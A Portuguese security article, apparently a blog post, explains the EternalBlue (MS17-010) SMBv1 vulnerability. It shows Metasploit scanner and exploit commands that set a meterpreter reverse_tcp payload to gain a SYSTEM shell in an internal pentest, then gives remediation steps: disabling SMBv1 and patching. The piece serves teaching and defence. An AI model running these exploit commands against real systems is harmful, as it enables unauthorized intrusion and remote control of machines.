Análise Técnica
EternalBlue é talvez a vulnerabilidade mais notória da última década, explorando uma falha crítica na implementação do protocolo SMBv1 (Server Message Block versão 1) no Windows. A vulnerabilidade reside na forma como o driver srv.sys manipula pacotes FEA (File Extended Attributes) malformados. Um atacante pode enviar um pacote especialmente criado que causa um buffer overflow no pool não paginado do kernel, permitindo a execução de código arbitrário com privilégios de kernel (Ring 0 / SYSTEM). Esta falha foi armada pela NSA e vazada pelo grupo Shadow Brokers, sendo usada no ransomware WannaCry.
Mapeamento e Exploração com Metasploit
O Metasploit possui módulos extremamente confiáveis para detecção e exploração desta falha.
- Módulo de Exploração: exploit/windows/smb/ms17_010_eternalblue
- Módulo de Scanner: auxiliary/scanner/smb/smb_ms17_010
Módulo de Comando: auxiliary/admin/smb/ms17_010_command (para execução rápida sem payload complexo).
Cenário de Exploração Detalhado:
Em um pentest interno, o operador descobre servidores legados (Windows Server 2008 R2 ou Windows 7).
- Detecção:
Bashmsf6 > use auxiliary/scanner/smb/smb_ms17_010
O scanner verifica a resposta do SMB sem travar o serviço, identificando hosts vulneráveis.
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.0.0/24
msf6 auxiliary(smb_ms17_010) > run - Exploração:
Bashmsf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(eternalblue) > set RHOSTS 192.168.0.10
msf6 exploit(eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(eternalblue) > run
O exploit realiza o “Grooming” da memória do kernel (organizando o heap para garantir que o overflow sobrescreva a estrutura correta) e injeta o shellcode. O resultado é uma shell SYSTEM imediata.
Remediação e Defesa em Profundidade
- Erradicação do SMBv1: A medida mais segura é desativar completamente o suporte ao protocolo SMBv1 em toda a infraestrutura, via GPO ou alteração de registro (Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” -Name SMB1 -Type DWORD -Value 0). O protocolo é obsoleto, ineficiente e inseguro.36
Patching: Aplicar o boletim de segurança MS17-010 (lançado em 2017) em todos os sistemas. Para sistemas sem suporte (XP, 2003), a Microsoft lançou patches excepcionais devido à gravidade.3
Apaixonado por tecnologia e segurança cibernética, com mais de 17 anos de experiencia na área atuando tecnicamente como Analista de Suporte de TI, Desenvolvedor, Infraetrutura e Segurança da Informação. Com sólida trajetória na área de Tecnologia da Informação e foco em Cibersegurança, dedico-me a identificar e mitigar vulnerabilidades críticas que ameaçam a continuidade de negócios, assim como atuo na governança baseada nos principais frameworks (ISO/IEC27001, ISO/IEC42000, NIST 800-115, PCIDSS etc.).
No responses yet